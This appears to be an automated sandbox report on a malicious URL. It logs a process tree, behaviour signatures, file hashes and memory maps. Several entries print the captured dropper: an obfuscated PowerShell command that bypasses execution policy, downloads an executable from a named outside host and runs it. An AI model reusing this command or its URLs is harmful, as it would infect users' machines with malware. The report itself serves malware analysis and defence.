Overview

overview

10

Static

static

URLScan

urlscan

http://r.news.anicia...

windows10_x64

10

Analysis

  • max time kernel
    147s
  • max time network
    141s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    18-01-2021 15:48

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    http://r.news.anicia.it/tr/cl/9m2sScoQCVor9DW6UIklodqgMetGY1Ei0vdnhjty-OV8X_t4ub0DlMGoO2hr9133cpQNXp-bSKW1oCsVqRjRbKpbTM42-CG2iQlBos3uDRwyECkKjYO7ukSGRaA_9ujIi80A7e2LFbNk5zNHhjrVKCCWbqKdKBJpn6n09dD39i5tdrmbTh7Y2uPefXxgtDMreAk5_Rwm-CbX0KFXsy90_OBykO_gMIsFvBjOlyIkqxpH2RF6T2RfRhpm-D1s815WH62xGr7uIw

  • Sample

    210118-pyt99z93je

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 55 IoCs
    adwarespyware
  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 18 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" http://r.news.anicia.it/tr/cl/9m2sScoQCVor9DW6UIklodqgMetGY1Ei0vdnhjty-OV8X_t4ub0DlMGoO2hr9133cpQNXp-bSKW1oCsVqRjRbKpbTM42-CG2iQlBos3uDRwyECkKjYO7ukSGRaA_9ujIi80A7e2LFbNk5zNHhjrVKCCWbqKdKBJpn6n09dD39i5tdrmbTh7Y2uPefXxgtDMreAk5_Rwm-CbX0KFXsy90_OBykO_gMIsFvBjOlyIkqxpH2RF6T2RfRhpm-D1s815WH62xGr7uIw
    1⤵
    • Modifies Internet Explorer Phishing Filter
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:652
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:3984
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:652 CREDAT:148483 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:2588
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1528
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_upload_GJ57Oz4lRN.zip\9gTyt7u4W6.js"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2128
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%IpJ64.exe'); & %temp%IpJ64.exe & osRmxvVtgjOTNWC
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2148
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempIpJ64.exe');
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2676
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_upload_GJ57Oz4lRN.zip\9gTyt7u4W6.js"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:2188
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%IpJ64.exe'); & %temp%IpJ64.exe & osRmxvVtgjOTNWC
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempIpJ64.exe');
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2268
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_upload_GJ57Oz4lRN.zip\9gTyt7u4W6.js"
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:3904
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%IpJ64.exe'); & %temp%IpJ64.exe & osRmxvVtgjOTNWC
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1132
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempIpJ64.exe');
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4064

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Modify Registry

    2
    T1112

    Credential Access

    Discovery

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
      MD5

      a17e7dcc10763b15af3483302b77658b

      SHA1

      37354de74572376e60a7163e115973f5eaff2a7a

      SHA256

      c403c61ad9fb9161b02665e1bfa1b73165ffb4056bdfc0f82664816f2b34dd25

      SHA512

      d72e40796c67068cac85209243e87fb5757f613738288fb53b18e1922671659e9a6bd705abaadb773a3f062ed1d8c9fba9ecbdab3930e793f923cb67e9465fa3

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      8e9d73c779718bc54bca9593f99686b1

      SHA1

      c827c1f0d2cf5db82ff8d53a24d19d6a460bb4bf

      SHA256

      9245e3c6272f2694e2e8100d159cd2fcc8e25551177e7f268dfa2ddfc3aa0396

      SHA512

      b1e444b98831adf6d12017464fd2b55ad51b9fd27b623d492ba378a8bebc2eb6e868d22218ede6b45d70d7ff54a4c5707ddce37769be33bf6188911d4020f5cb

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
      MD5

      fcb4d489c9ab90737251a18f48549263

      SHA1

      ccde6e088571dc91c715fdc186e493feb60a8927

      SHA256

      2b5785523406dd0b92ab4f3f11e6ae62ac749589f5082356993f9b03751adbcb

      SHA512

      1fb18a39475afab056f2ff1958b7e78b68ef50aede26ca96386c9948b93c62a72817c7d1b7a17107a7aae0efd278b9cbfa439bbb534b9c212eab5c5bbd9841e9

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
      MD5

      c81d8386b95be647bd480d7ca3a91edb

      SHA1

      24ee838b8b12a34c20e8497615c8114395cd528d

      SHA256

      9a830b808d059951e5844417d2a808d7d83b1facb0bea04873758f830e25e88e

      SHA512

      a1703bd5cbacd135ecafae979b48825233cb48270c09d019a07d511ae22a33ab88a7f293f32816a16c3c266514664f9a9f5e6b02ef3abf8759091f217571ff52

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
      MD5

      dec709149906c782aa806509039a5c89

      SHA1

      cd8b6dbb8944790f61f97c1d94bd4d35c024e1d6

      SHA256

      d764cae8a1a5928890eb29c46a03e8512a731d5a35711ce7c31d7d3047895e4a

      SHA512

      9b12837168b334ba1b4006bb14abb46fdeaede533a03e2f84596c15e8f52d83824ea5187b8b40fa71241221473949ac7a9f24dc908ee79c5abafca799ca078ab

      Download Submit
    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
      MD5

      a4a6bcad42c645b2cb2910e34d9714cf

      SHA1

      87c917cc62b31467e4a7e7d9613a64356e572711

      SHA256

      6d9690284586102fb62aaf02e40b56b1b7fed1ea82616f44741df5a3cf97335d

      SHA512

      48a673887d53abc0a5ff8ddd594c9e9b1ea98bd20250f8b54202271f8a04a6ab59a6bce45b87cad15ef443a3be84fbb5aab2c3756157c261d9006e1799ad083e

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
      MD5

      d737fc27bbf2f3bd19d1706af83dbe3f

      SHA1

      212d219394124968b50769c371121a577d973985

      SHA256

      b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982

      SHA512

      974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\UOAPEAJQ\upload_GJ57Oz4lRN.zip.xv1kw52.partial
      MD5

      61048e5214efbd1deaecee2ee3e2041a

      SHA1

      214757c8dc456cf7190933d27dafb276d893efe9

      SHA256

      7473625e9b0455f256aeac81aa806d4b53e5baf3f5b2fe3bcd55cbabcc348af2

      SHA512

      999d38cbc2f5ad2ea439795ed49dba82eb521d6b1b0ca33dfdfaffa01c4981ce5230753453191d429abe3bcaec96bf2bf6afeb884da52f966b565dccc049c8f7

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\EOO5AFIM.cookie
      MD5

      a928700aee3070e5aee415e692ce50d3

      SHA1

      b61136c423729f6f35ca86ca38f85a38fdbc9ef2

      SHA256

      e1120958f48e6f75d230198b7db71e3c0f84d0131c5147a0bef048c592336749

      SHA512

      6d50b17c42d72091d86c8c70d8e9edcac58682a16322cc3c1c72c940b713520a6b3fbbfaaf5021257c2a20d26f777c3b198604a6db12a5b8e673759caae9649a

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      d29754121698a64f2f14cfb52c327d4b

      SHA1

      ac09574a39c23484ca33b39d9689c3e2bcf6a5dd

      SHA256

      29d8b2453514a869249b59f37bbbdccac910fb9e4a13bda855d3112a4fe26b71

      SHA512

      25cfc15d0cfda47fb9105418857d008bb3fb20c41089dffe8e6fd8e83547e9d9c9b53aaabba1b44d998bb0b110a95568c16b92bb340e5e5ab352d5c638fcd385

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      MD5

      94048fa5e02a5af34d0ca2e298931857

      SHA1

      420eabecfd5f8af6895a1e27f9ade85e18a5d507

      SHA256

      144c5cbd8d662c96840072ee0f013747b72bd5edd34b2860f0968a14f6ce5c8a

      SHA512

      e4c3bc00c77e329d8ef194253dec10b846ed65e73f53353926d582492d32102dba2ee0a5755af64496336bd2e9fce37eeb0d4ba3f0e9bb7000c5a39280c14c68

      Download Submit
    • C:\Users\Admin\AppData\Local\TempIpJ64.exe
      MD5

      2f5cded6abfe8576ea9ce3c91916efb3

      SHA1

      2e45ab8e29f1a10b9261df8f1567b26cfd24284c

      SHA256

      2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15

      SHA512

      de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

      Download Submit
    • C:\Users\Admin\AppData\Local\TempIpJ64.exe
      MD5

      2f5cded6abfe8576ea9ce3c91916efb3

      SHA1

      2e45ab8e29f1a10b9261df8f1567b26cfd24284c

      SHA256

      2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15

      SHA512

      de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

      Download Submit
    • C:\Users\Admin\AppData\Local\TempIpJ64.exe
      MD5

      2f5cded6abfe8576ea9ce3c91916efb3

      SHA1

      2e45ab8e29f1a10b9261df8f1567b26cfd24284c

      SHA256

      2883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15

      SHA512

      de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98

      Download Submit
    • memory/1132-33-0x0000000000000000-mapping.dmp
      Download
    • memory/1788-22-0x0000000000000000-mapping.dmp
      Download
    • memory/2148-12-0x0000000000000000-mapping.dmp
      Download
    • memory/2188-21-0x000001FF0FD50000-0x000001FF0FD54000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2268-28-0x000001C458C33000-0x000001C458C35000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2268-23-0x0000000000000000-mapping.dmp
      Download
    • memory/2268-25-0x00007FFC32870000-0x00007FFC3325C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/2268-27-0x000001C458C30000-0x000001C458C32000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2268-32-0x000001C458C36000-0x000001C458C38000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2588-7-0x0000000000000000-mapping.dmp
      Download
    • memory/2676-14-0x00007FFC32870000-0x00007FFC3325C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/2676-13-0x0000000000000000-mapping.dmp
      Download
    • memory/2676-15-0x000002126F570000-0x000002126F571000-memory.dmp
      Filesize

      4KB

      Download
    • memory/2676-18-0x000002126FB13000-0x000002126FB15000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2676-20-0x000002126FB16000-0x000002126FB18000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2676-17-0x000002126FB10000-0x000002126FB12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/2676-16-0x000002126FA80000-0x000002126FA81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3984-2-0x0000000000000000-mapping.dmp
      Download
    • memory/4064-35-0x00007FFC32870000-0x00007FFC3325C000-memory.dmp
      Filesize

      9.9MB

      Download
    • memory/4064-39-0x00000169EA610000-0x00000169EA612000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4064-40-0x00000169EA613000-0x00000169EA615000-memory.dmp
      Filesize

      8KB

      Download
    • memory/4064-34-0x0000000000000000-mapping.dmp
      Download
    • memory/4064-42-0x00000169EA616000-0x00000169EA618000-memory.dmp
      Filesize

      8KB

      Download